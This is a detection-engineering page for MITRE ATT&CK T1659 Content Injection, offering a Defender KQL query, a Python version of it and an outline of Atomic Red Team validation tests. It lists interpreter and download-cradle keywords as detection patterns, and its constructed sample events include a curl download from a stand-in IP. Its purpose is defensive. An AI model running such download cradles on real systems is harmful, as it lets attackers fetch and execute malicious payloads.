T1659

Content Injection

Tactics: Initial Access, Command and Control

This detection identifies adversary content injection attacks where malicious payloads are delivered by manipulating in-transit network traffic between victims and legitimate online services. Rather than hosting payloads on attacker-controlled websites, adversaries operating at a compromised network position—such as a compromised ISP or routing infrastructure—intercept and modify DNS, HTTP, or SMB responses before they reach the victim. The detection focuses on three behavioral indicators: suspicious interpreter or downloader processes spawned by web browsers or Windows Update components following unencrypted HTTP connections to known update domains; HTTP connections to Microsoft update infrastructure over plaintext port 80 (which should exclusively use HTTPS/443); and DNS resolutions of trusted domains returning IP addresses outside expected authoritative ranges. Known threat activity consistent with this technique includes MoustachedBouncer injecting fake Windows Update pages to deploy malware against diplomatic targets in Belarus, and the Disco implant achieving initial access through injected DNS, HTTP, and SMB replies that redirected victims to attacker-controlled download servers.

What is T1659 Content Injection?

Content Injection (T1659) maps to the Initial Access and Command and Control tactics in MITRE ATT&CK: the adversary is trying to get into your network and to communicate with compromised systems in order to control them.

This page provides production-ready detection logic for Content Injection, covering the data sources and telemetry it touches: Microsoft Defender for Endpoint. The queries below are rated high severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.

MITRE ATT&CK

Tactic: Initial Access, Command and Control
Technique: T1659 Content Injection
Canonical reference: https://attack.mitre.org/techniques/T1659/
Microsoft Sentinel / Defender
```kusto
let LookbackTime = 1d;
// Update domains that should only be reached over HTTPS/443.
let UpdateDomains = dynamic(["windowsupdate.com", "update.microsoft.com", "download.microsoft.com", "delivery.mp.microsoft.com"]);
// Interpreter and downloader binaries that injected content typically launches.
let SuspiciousChildren = dynamic(["wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe", "powershell.exe", "cmd.exe"]);
// Processes that consume in-transit content: browsers and the Windows Update service host.
let InjectionParents = dynamic(["svchost.exe", "wuauclt.exe", "usoclient.exe", "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"]);
// Plaintext HTTP (port 80) connections to update infrastructure.
let HttpUpdateConnections = DeviceNetworkEvents
| where TimeGenerated > ago(LookbackTime)
| where RemotePort == 80
| where RemoteUrl has_any (UpdateDomains)
| project DeviceId, DeviceName, NetworkTime = TimeGenerated, RemoteIP, RemoteUrl;
// Interpreter/downloader children of those parents with a download-style command line
// or a temp/downloads working path.
let SuspiciousSpawns = DeviceProcessEvents
| where TimeGenerated > ago(LookbackTime)
| where InitiatingProcessFileName in~ (InjectionParents)
| where FileName in~ (SuspiciousChildren)
| where ProcessCommandLine has_any ("http://", "invoke-webrequest", "wget", "curl", "-enc ", "download", "bitsadmin")
    or FolderPath has "temp" or FolderPath has "downloads"
| project DeviceId, DeviceName, ProcessTime = TimeGenerated, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, AccountName, SHA256;
// Pair connections and spawns on the same device that occur within 5 minutes of each other.
HttpUpdateConnections
| join kind=inner SuspiciousSpawns on DeviceId
| where abs(datetime_diff('second', NetworkTime, ProcessTime)) <= 300
| project NetworkTime, ProcessTime, DeviceName, AccountName, RemoteIP, RemoteUrl, SuspiciousProcess = FileName, SuspiciousProcessPath = FolderPath, ProcessCommandLine, ParentProcess = InitiatingProcessFileName, ParentCommandLine = InitiatingProcessCommandLine, SHA256, TimeDeltaSec = abs(datetime_diff('second', NetworkTime, ProcessTime))
| order by NetworkTime desc
```

Correlates unencrypted HTTP connections to Microsoft update domains with suspicious child process spawning from browser or Windows Update service parents within a 5-minute window on the same device. The time-based join on DeviceId identifies cases where injected content was delivered over HTTP and immediately resulted in interpreter or downloader process execution — the expected post-injection behavior observed in MoustachedBouncer and Disco campaigns where victims received fake Windows Update payloads over manipulated HTTP responses.
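The same correlation as the KQL query above, reimplemented in Python over constructed records shaped like DeviceNetworkEvents and DeviceProcessEvents rows, so the filter lists and the 5-minute join can be exercised offline while tuning. This is an added example, not the page's or Microsoft's code; the sample events, device ids and the 198.51.100.1 address are constructed.

```python
from datetime import datetime, timedelta

# Same allow/deny lists and 5-minute window as the KQL query above.
UPDATE_DOMAINS = ("windowsupdate.com", "update.microsoft.com", "download.microsoft.com", "delivery.mp.microsoft.com")
SUSPICIOUS_CHILDREN = {"wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                       "certutil.exe", "bitsadmin.exe", "msiexec.exe", "powershell.exe", "cmd.exe"}
INJECTION_PARENTS = {"svchost.exe", "wuauclt.exe", "usoclient.exe", "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
CMDLINE_TOKENS = ("http://", "invoke-webrequest", "wget", "curl", "-enc ", "download", "bitsadmin")
WINDOW_SEC = 300

def is_http_update_conn(ev):
    """Plaintext port-80 connection whose URL names an update domain."""
    return ev["RemotePort"] == 80 and any(d in ev["RemoteUrl"].lower() for d in UPDATE_DOMAINS)

def is_suspicious_spawn(ev):
    """Interpreter/downloader child of a browser or Windows Update parent with a
    download-style command line or a temp/downloads path (substring matching is a
    simplification of KQL's term-based has/has_any)."""
    cmd, path = ev["ProcessCommandLine"].lower(), ev["FolderPath"].lower()
    return (ev["InitiatingProcessFileName"].lower() in INJECTION_PARENTS
            and ev["FileName"].lower() in SUSPICIOUS_CHILDREN
            and (any(t in cmd for t in CMDLINE_TOKENS) or "temp" in path or "downloads" in path))

def correlate(net_events, proc_events):
    """Inner join on DeviceId keeping pairs within WINDOW_SEC; returns
    (DeviceId, RemoteUrl, child FileName, seconds apart) sorted by time gap."""
    hits = []
    for c in filter(is_http_update_conn, net_events):
        for s in filter(is_suspicious_spawn, proc_events):
            if c["DeviceId"] != s["DeviceId"]:
                continue
            delta = abs((c["TimeGenerated"] - s["TimeGenerated"]).total_seconds())
            if delta <= WINDOW_SEC:
                hits.append((c["DeviceId"], c["RemoteUrl"], s["FileName"], int(delta)))
    return sorted(hits, key=lambda h: h[3])

# Constructed sample telemetry (not real logs), shaped like the two Defender tables.
T0 = datetime(2024, 1, 1, 12, 0, 0)
def net(dev, port, url):
    return {"DeviceId": dev, "TimeGenerated": T0, "RemotePort": port, "RemoteUrl": url}
def proc(dev, secs, child, path, cmd, parent):
    return {"DeviceId": dev, "TimeGenerated": T0 + timedelta(seconds=secs), "FileName": child,
            "FolderPath": path, "ProcessCommandLine": cmd, "InitiatingProcessFileName": parent}
NET = [net("ws01", 80, "http://download.microsoft.com/update.cab"),   # plaintext update fetch
       net("ws02", 443, "https://update.microsoft.com/")]            # HTTPS: not matched
PROC = [proc("ws01", 90, "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0", "powershell.exe -enc AAAA", "msedge.exe"),  # true positive, 90 s apart
        proc("ws01", 900, "cmd.exe", r"C:\Windows\System32", "cmd.exe /c curl http://198.51.100.1/update.cab", "svchost.exe"),  # outside the 300 s window
        proc("ws02", 30, "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0", "powershell.exe Invoke-WebRequest https://update.microsoft.com/", "chrome.exe")]  # no port-80 connection on ws02
```

Only the ws01 pair 90 seconds apart survives; the late spawn and the HTTPS-only device drop out exactly as they would in the KQL join.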

Severity: high. Confidence: medium.

Data Sources

Microsoft Defender for Endpoint

Required Tables

  • DeviceNetworkEvents
  • DeviceProcessEvents

False Positives

  • Legacy enterprise systems still configured to use HTTP for Windows Update (pre-WSUS TLS migration) may generate benign HTTP connections to update domains matched by the network filter
  • Corporate WSUS or SCCM proxy servers that use HTTP internally to redistribute updates will cause svchost.exe to connect to update domains over port 80 as a legitimate workflow
  • IT automation tools (SCCM client actions, Intune management extensions, Ansible) that legitimately spawn PowerShell or cmd.exe via svchost.exe as part of managed patch workflows
  • Developers testing HTTP client libraries or update utilities who manually trigger download cradles from a browser session within the 5-minute correlation window

Sigma rule & cross-platform mapping

The detection logic for Content Injection (T1659) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native queries in KQL (Microsoft Sentinel / Defender), SPL (Splunk), EQL (Elastic Security), AQL (IBM QRadar), Sumo Logic CSE, YARA-L (Google Chronicle / SecOps) and CQL (CrowdStrike LogScale). In Sigma terms, this detection targets the following logsource:

logsource:
  category: process_creation
  product: windows

Testing Methodology

Validate this detection against 3 Atomic Red Team tests. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Simulate DNS Injection via Hosts File Redirect of Update Domain

    Expected signal: Sysmon Event ID 22 (DNS Query) showing download.microsoft.com with QueryResults containing 198.51.100.1; Sysmon Event ID 1 for nslookup.exe process creation with command line including 'download.microsoft.com'

  2. Test 2: Simulated Injected Payload Execution from Browser-Spawned Process

    Expected signal: Sysmon Event ID 1 for cmd.exe spawning powershell.exe with Invoke-WebRequest and http:// URI in CommandLine; Sysmon Event ID 3 showing powershell.exe attempting TCP connection to 198.51.100.1:80; working directory will be user profile or temp path

  3. Test 3: LOLBin Certutil Download Cradle from Temp Path

    Expected signal: Sysmon Event ID 1 for certutil_test.exe (copied certutil) executing from %TEMP% path with -urlcache and http:// URL in CommandLine; Sysmon Event ID 3 for HTTP connection attempt from temp path binary to 198.51.100.1:80; Sysmon Event ID 11 for file copy creating certutil_test.exe in temp
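The third behavioral indicator from the overview (trusted domains resolving outside expected ranges) is what Test 1 exercises, and it is not covered by the KQL above. This added example, not the page's or any vendor's code, parses the Sysmon Event ID 22 QueryResults format and flags answers outside an allowlist; the allowlist range 203.0.113.0/24, the CDN name and the sample records are constructed placeholders, not Microsoft's real address space.

```python
import ipaddress

# Assumed allowlist (placeholder range, not Microsoft's real address space):
# populate it from the answers your own resolver telemetry normally returns.
EXPECTED_RANGES = {
    "download.microsoft.com": [ipaddress.ip_network("203.0.113.0/24")],
}

def parse_query_results(query_results):
    """Extract answer addresses from a Sysmon Event ID 22 QueryResults string.
    Sysmon packs answers ';'-separated, CNAMEs as 'type: N name', and IPv4
    answers as IPv6-mapped '::ffff:a.b.c.d', which is normalised back to IPv4."""
    ips = []
    for part in (p.strip() for p in query_results.split(";")):
        if not part or part.startswith("type:"):
            continue
        try:
            ip = ipaddress.ip_address(part)
        except ValueError:
            continue  # unparsable fragment, e.g. a bare host name
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
            ip = ip.ipv4_mapped
        ips.append(ip)
    return ips

def unexpected_answers(query_name, query_results):
    """Answer IPs for a monitored domain (or a sub-label of it) that fall outside
    its expected ranges; an empty list means nothing to flag."""
    name = query_name.lower()
    ranges = next((r for d, r in EXPECTED_RANGES.items()
                   if name == d or name.endswith("." + d)), None)
    if ranges is None:
        return []
    return [ip for ip in parse_query_results(query_results) if not any(ip in n for n in ranges)]

# Constructed Sysmon EID 22 (QueryName, QueryResults) pairs, not real logs: a normal
# CDN answer inside the allowlist, and the Test 1 redirect to 198.51.100.1.
SAMPLE = [
    ("download.microsoft.com", "type:  5 dl.example-cdn.net;::ffff:203.0.113.10;"),
    ("download.microsoft.com", "::ffff:198.51.100.1;"),
]
```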

Unlock Pro Content

Get the full detection package for T1659 including response playbook, investigation guide, and atomic red team tests.
